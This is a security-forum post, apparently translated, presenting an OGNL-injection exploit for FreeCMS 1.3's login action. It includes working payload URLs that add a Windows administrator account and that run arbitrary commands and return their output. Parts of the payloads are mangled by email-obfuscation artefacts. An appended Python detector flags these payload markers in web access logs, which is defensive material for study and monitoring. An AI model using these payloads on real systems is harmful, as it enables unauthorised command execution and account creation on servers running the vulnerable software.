FreeCms Command Execution (OGNL Evaluation-Order Bypass Vulnerability, with EXP)


Author: 园长

Open-source, free Java CMS - FreeCMS 1.3 - data object - mail

Project URL: https://code.google.com/p/freecms/

The EXP utility published earlier does not work here, but commands can be executed and a shell written with a tool I released previously.

Vulnerability description (just look at how EXP 3 is used):

Locate the login page: http://localhost:8080/ff/login.jsp

Obtain the form parameters from the page source yourself, or extract them automatically with the tool mentioned above.

Then change the submitted action to: http://localhost:8080/ff/login_login.do?user.loginname=EXP

Just pick a request whose parameter type is String.

Add an account: http://localhost:8080/ff/login_login.do?user.loginname=%28%23context[%22xwork.MethodAccessor.denyMethodExecution%22]%3D+new+java.lang.Boolean%28false%29,%20%23_memberAccess[%22allowStaticMethodAccess%22]%3d+new+java.lang.Boolean%28true%29,%[email protected]@getRuntime%28%29.exec('net user admin admin /add%27%29%29%28meh%29&z[%28user.loginname%29%28%27meh%27%29]=true

Someone asked: what about command execution? Where? Heh, just tweak the earlier EXP:

http://localhost:8080/ff/login_login.do?user.loginname=(
%23context["xwork.MethodAccessor.denyMethodExecution"]= new java.lang.Boolean(false),
%23_memberAccess["allowStaticMethodAccess"]=new java.lang.Boolean(true),
%[email protected]@getRequest(),
%[email protected]@getRuntime().exec(%23req.getParameter(%22cmd%22)),
%23iswinreader=new java.io.DataInputStream(%23exec.getInputStream()),
%23buffer=new byte[1000],
%23iswinreader.readFully(%23buffer),
%23result=new java.lang.String(%23buffer),
%[email protected]@getResponse(),
%23response.getWriter().println(%23result)
)
&z[(user.loginname)('meh')]=true&cmd=cmd /c set
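As an added defensive example that is not part of the original post: the payloads above are recognisable in web-server access logs by a handful of OGNL markers (`#context[`, `#_memberAccess`, the `denyMethodExecution` and `allowStaticMethodAccess` flags, and the `z[(...)('...')]` nested-evaluation parameter). The detector below URL-decodes each request's query string and flags lines carrying two or more of them; the log lines, client addresses and marker names are constructed for illustration.

```python
import re
from urllib.parse import unquote_plus

# OGNL-injection markers seen in the Struts2/XWork payloads quoted above,
# applied to the URL-decoded query string of each request.
OGNL_MARKERS = {
    "context_access": re.compile(r"#context\s*\[", re.I),
    "member_access": re.compile(r"#_memberAccess", re.I),
    "deny_method_execution": re.compile(r"denyMethodExecution", re.I),
    "allow_static_access": re.compile(r"allowStaticMethodAccess", re.I),
    "static_call": re.compile(r"@[\w.]+@\w+"),               # OGNL @class@member
    "nested_eval_param": re.compile(r"\[\s*\([^)]*\)\s*\("),  # z[(user.loginname)('meh')]
}
# Common log format: client ident user [time] "METHOD target PROTO" status bytes
LOG_LINE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(\S+) (\S+) [^"]*" (\d{3})')

def decode_query(target: str) -> str:
    """URL-decode the query part of a request target, twice, so a single
    extra encoding layer (%2523 -> %23 -> #) cannot hide the markers."""
    _, _, query = target.partition("?")
    return unquote_plus(unquote_plus(query))

def detect_ognl(target: str) -> list[str]:
    """Names of the OGNL markers present in a request target's query string."""
    decoded = decode_query(target)
    return [name for name, rx in OGNL_MARKERS.items() if rx.search(decoded)]

def scan_access_log(text: str, min_markers: int = 2) -> list[dict]:
    """One finding per log line carrying at least `min_markers` markers;
    requiring two keeps a lone '#' or '@' inside a value from alerting."""
    findings = []
    for line in text.splitlines():
        m = LOG_LINE.match(line)
        if not m:
            continue
        client, method, target, status = m.groups()
        markers = detect_ognl(target)
        if len(markers) >= min_markers:
            findings.append({"client": client, "method": method,
                             "path": target.partition("?")[0],
                             "status": int(status), "markers": markers})
    return findings

# Constructed sample access log (not real traffic): a benign login-page hit, a
# request with the account-creation payload shape from the post, a benign login.
SAMPLE_LOG = """\
10.0.0.5 - - [01/Jan/2014:10:00:00 +0800] "GET /ff/login.jsp HTTP/1.1" 200 512
10.0.0.5 - - [01/Jan/2014:10:00:01 +0800] "GET /ff/login_login.do?user.loginname=(%23context[%22xwork.MethodAccessor.denyMethodExecution%22]%3Dnew+java.lang.Boolean(false),%23_memberAccess[%22allowStaticMethodAccess%22]%3Dnew+java.lang.Boolean(true))(meh)&z[(user.loginname)('meh')]=true HTTP/1.1" 200 128
10.0.0.9 - - [01/Jan/2014:10:00:02 +0800] "GET /ff/login_login.do?user.loginname=bob(1) HTTP/1.1" 200 512
"""
```

Running `scan_access_log(SAMPLE_LOG)` yields a single finding for the second line; a WAF or log pipeline can apply the same markers to `POST` bodies, since the parameter name itself is what gets evaluated.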
